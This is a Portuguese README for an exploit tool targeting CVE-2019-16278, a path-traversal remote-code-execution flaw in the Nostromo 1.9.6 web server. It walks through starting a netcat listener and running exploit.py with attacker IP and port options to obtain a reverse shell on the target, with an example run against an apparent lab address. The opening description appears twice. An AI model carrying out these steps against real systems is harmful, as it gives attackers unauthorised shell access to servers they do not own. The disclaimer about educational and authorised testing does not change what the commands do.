
Este repositório contém um exploit para CVE-2019-16278 no servidor web Nostromo 1.9.6, permitindo execução remota de código através de uma vulnerabilidade de traversal de diretórios. O script utiliza pwntools para estabelecer um shell reverso. Apenas para uso educacional e testes autorizados.
Este repositório contém um exploit para o CVE-2019-16278 no Nostromo Web Server 1.9.6, permitindo execução remota de código através de uma vulnerabilidade de path traversal. O script utiliza a biblioteca pwntools para estabelecer um reverse shell. Apenas para uso educacional e testes autorizados.
Para instalar o pwntools, use:
pip3 install pwntools
Inicie um Listener: Na máquina atacante, inicie um listener na porta especificada para receber o reverse shell:
nc -lvnp <porta-atacante>
Execute o Script: Use o seguinte comando para executar o script de exploit. Substitua os valores conforme necessário.
python3 exploit.py --attacker-ip <ip-atacante> --attacker-port <porta-atacante> [-t ip-alvo] [-p porta-alvo]
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
Neste exemplo:
--attacker-ip 10.10.14.15 é o endereço IP da máquina atacante.--attacker-port 4444 é a porta na qual a máquina atacante está ouvindo o reverse shell.-t 10.10.10.165 especifica o IP alvo (padrão é 10.10.10.165).-p 80 especifica a porta alvo (padrão é 80).nc).Se bem-sucedido, você deve receber um reverse shell no seu listener com acesso ao sistema alvo.
Este script é destinado apenas para fins educacionais e testes autorizados. O acesso não autorizado a sistemas de computadores é ilegal. O autor e os colaboradores não se responsabilizam por qualquer uso indevido ou danos causados por esta ferramenta. Utilize-a de forma responsável e apenas em sistemas que você tenha permissão para testar.
| Opção | Descrição | Padrão |
|---|
-t, --target | Endereço IP do host remoto | 10.10.10.165 |
-p, --port | Porta do host remoto a ser alvo | 80 |
--attacker-ip | Endereço IP da máquina atacante para o reverse shell | Nenhum (obrigatório) |
--attacker-port | Porta da máquina atacante para o reverse shell | Nenhum (obrigatório) |